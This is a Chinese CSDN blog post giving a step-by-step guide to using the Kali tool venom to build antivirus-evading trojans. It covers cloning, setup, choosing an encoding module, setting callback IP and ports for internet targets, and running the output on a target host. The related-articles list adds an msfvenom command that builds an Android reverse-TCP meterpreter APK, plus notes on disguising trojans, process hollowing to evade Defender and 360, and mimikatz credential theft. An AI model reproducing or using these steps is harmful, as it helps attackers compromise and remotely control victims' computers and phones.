破除安全软件的防御-------黑客免杀的生成

最新推荐文章于 2024-04-23 14:07:35 发布
最新推荐文章于 2024-04-23 14:07:35 发布
阅读量374 收藏 3
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45848361/article/details/110358056
版权

一、什么是黑客免杀

kali利用venom生成免杀木马
1.获取源码
git clone https://github.com/r00t-3xp10it/venom.git
2.设置权限
cd venom
sudo chmod -R +x *.sh
sudo chmod -R +x *.py
3.执行安装
cd aux
sudo ./setup.sh
4.运行
sudo ./venom.sh
5选择对应的操作系统
6选择相应的攻击模块
这里可以看到,总共有20个攻击模块,不同额模块有不同的编码方式来绕过杀毒软件的查杀。例如第二十个模块
它采用的语言编码是psh-cmd也就是我们常说的dos命令编写,可以生成.bat或者.exe文件来进行攻击。
这里我们以第15个模块为例。

选择模块后,要求我们输入ip地址。要是内网的话,输入内网的ip地址,要是外网的话,输入外网的ip地址即可。

然后是输入端口的问题了,内网的来说相对简单,但是对于外网而言需要输入外网的端口,花生壳的话可以直接利用花生壳提供的端口,如果是外网服务器需用用到端口转发。

其他注意事项:
1.如果生成的木马时远程木马,也就是我们说的外网木马,在生成木马时用到的ip地址和端口都是外网的。但是在msf终端配置的时候,配置的是内网的ip和端口。
2.由于延迟,获取网络问题不能及时获得shell需要等待,这属于正常情况。
3.由于网络原因,或者中间件出现问题,导致shell中断。这属于正常情况。
7然后输入生成shell的名称
8生成木马
9生成的木马在output目录下,我们在目标主机运行即可。

云计算架构师0001
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8045
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
Kali Linux利用MSF入侵安卓手机
weixin_42916109的博客
06-06 5867
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行。我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令。提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可。
Python shellcode免杀无文件落地
qq_43658820的博客
04-23 377
总结:python的免杀在我个人看来已经不推荐了。pyinstaller打包特征过于明显,python本身是高级解释性语言,没有c的底层api 你用Virtual alloc分配内存也特别明显,编译后的exe文件极其容易被查出特征。尽管有时可以过一些杀软,考虑性价比 仍然不推荐用python。你可以尝试改改特征,换个打包工具。应该还是可以有时过掉比较难过的杀软。某数字杀软本身宁错杀勿放过,其次人家有智慧云大脑,这玩意只要被查出来就会上传云上,之后就不免杀。使用pyinstaller打包客户端。
简单的Msf木马免杀
weixin_47948655的博客
08-12 995
简单加密shellcode与加载器实现msf木马免杀
靶机渗透练习79-Venom
hirak0的博客
04-21 2541
靶机描述 靶机地址:https://www.vulnhub.com/entry/venom-1,701/ Description This machine was created for the OSCP Preparation.This box was created with virtualbox. For any queries please contact me on twitter: @avi0813. Enumeration is the Key. 一、搭建靶机环境 攻击机Kali
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
wechat-oauth2-proxy
05-10
wechat-oauth2-proxy 为什么要有这个项目?...wechat-oauth2-proxy 的出现是为了破除这种限制。 部署指南 需求 Node >= 7.6.0 环境变量 该应用使用环境变量控制应用运行状态。 环境变量 默认值 说明 PRO
行业资料-交通装置-一种桥梁桩基桩头破除装置及桩头破除方法.zip
08-27
行业资料-交通装置-一种桥梁桩基桩头破除装置及桩头破除方法.zip
行业资料-交通装置-一种桥面铺装混凝土快速、微震破除方法.zip
09-03
行业资料-交通装置-一种桥面铺装混凝土快速、微震破除方法.zip
od---破除vmp--壳保护-新建文件夹
01-21
od---破除vmp--壳保护-新建文件夹
WindowsAPI - 函数定义大全
04-30
Windows API函数 操作系统除了协调应用程序的执行、内存分配、系统资源管理外,同时也是一个很大...我们这篇API入门教程的目的,就是要把API函数的来龙去脉告诉大家,破除对API函数的畏惧,使它成为我们编程的好助手。
kali安卓手机木马远控
热门推荐
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
kali之vulhub,medium_socnet
weixin_54431413的博客
05-06 1826
一、部署环境 二、进行主机发现,arp-scan进行扫描 三、使用nmap扫描发现的靶机IP 四、扫目录(dirsearch脚本;和windous御剑类似) 五、跳出docker容器系统隔离环境 六、内网穿透 七、对内网地址172.17.0.1进行扫描 八、对内网地址172.17.0.2进行扫描 九、利用开放的22端口ssh服务 十、提权 十一、成功拿到宿主机root权限
利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
WuHao的博客
10-26 5641
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马。 首先安装Venom Venon克隆地址:https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo.
5.15更新!免杀绕过Defender、360
潇湘信安的博客
07-18 1971
python3写的这个免杀工具,其原理是利用windows提供的API运行指定程序,然后修改其内存数据,将目标进程“掏空”替换成恶意的木马程序以达到隐蔽和免杀的目的。
关于木马免杀的一些方法
oiadkt的博客
04-27 1265
关于木马免杀的一些方法
TideSec远控免杀学习一(免杀基础+msfvenom隐藏的参数)
fa1lr4in的小博客
02-08 2626
参考链接:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 参考资料 免杀技术有一套:https://anhkgg.com/aanti-virus/ Meterpreter免杀及对抗分析:https://www.freebuf.com/sectool/157122.html 免杀艺术:https://www.4hou.com/technol...
内网渗透-常用工具免杀
jklbnm12的博客
08-25 1412
内网渗透-常用工具免杀 Mimikatz免杀 Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌等诸多功能。由于mimikatz的使用说明网上资料很多,这里就不多加介绍了,随着这两年hw行动越来越多,企事业单位也都开始注重内网安全,有预算的会上全套的终端安全、企业版杀软或者EDR,就算没有预算的也会装个360全家桶或者主机卫士之类的,这也导致很多时候你的mimikatz可能都没法拷贝过去或者没有加载执行,拿了台服务器却横向移不动就尴尬了。因为这款工
FileNotFoundError: [Errno 2] No such file or directory: '毒液:致命守护者 Venom-豆瓣短评.csv'
最新发布
04-25
当使用`with open()`加载文件内容时,如果文件不存在,会出现`FileNotFoundError: [Errno 2] No such file or directory`的错误。解决这个问题的方法有多种。下面是两种常见的解决方法: 1. 使用`try-except`语句捕获异常[^1]: ```python try: with open('毒液:致命守护者 Venom-豆瓣短评.csv', 'r') as file: # 处理文件内容 except FileNotFoundError: print("文件不存在") ``` 2. 使用`os.path.exists()`函数检查文件是否存在: ```python import os file_path = '毒液:致命守护者 Venom-豆瓣短评.csv' if os.path.exists(file_path): with open(file_path, 'r') as file: # 处理文件内容 else: print("文件不存在") ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

云计算架构师0001

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值